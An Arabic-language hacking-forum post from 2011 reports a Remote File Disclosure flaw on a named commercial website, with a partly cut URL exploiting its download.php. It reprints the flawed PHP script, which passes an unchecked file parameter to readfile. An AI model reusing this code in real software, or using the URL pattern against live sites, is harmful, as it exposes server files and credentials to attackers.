عرض مشاركة واحدة
قديم 08-18-2011, 03:29 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
ZrIqE ViRuS
 
الصورة الرمزية ZrIqE ViRuS
 

 

 
إحصائية العضو





ZrIqE ViRuS غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ZrIqE ViRuS is on a distinguished road

افتراضي {10} >Remote File Disclosure تطبيق <{10}


السلام عليكم

اليوم كنت بلف شويه بالمواقع فلقيت هالثغره

http://tuffdocksystems.com/download....e=download.php

طبعا هاد تطبيق ع الثغره والي يشوفها يقرا الكود البرمجي الي مطبق للثغره

للمزيد حول الثغره تم شرحه بالدوره من هنا


http://www.vbspiders.com/vb/t32090.html

اتمنا تكون هاي الثغره وضحت الان اكثر
وهذا كود الثغره

كود PHP:

<?
$file 
$_GET['file'];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
موفقين


V10C >Remote File Disclosure j'fdr <V10C

التوقيع

[CENTER]

كود PHP:
the bad Game
sometimes i help my friend 
and raise him to the sky
in cloudy day everything has been changed by different way
the most bad thing ever 
for me is arrogance
insolently he was arrogant to me
he want me trampling his face
and everyone ask him why there is footsteps on your face
my silence means just to give him more chance to correct his problem 

المستخدم غائب حتى
6-9-2011
دعواتكم

 

   

رد مع اقتباس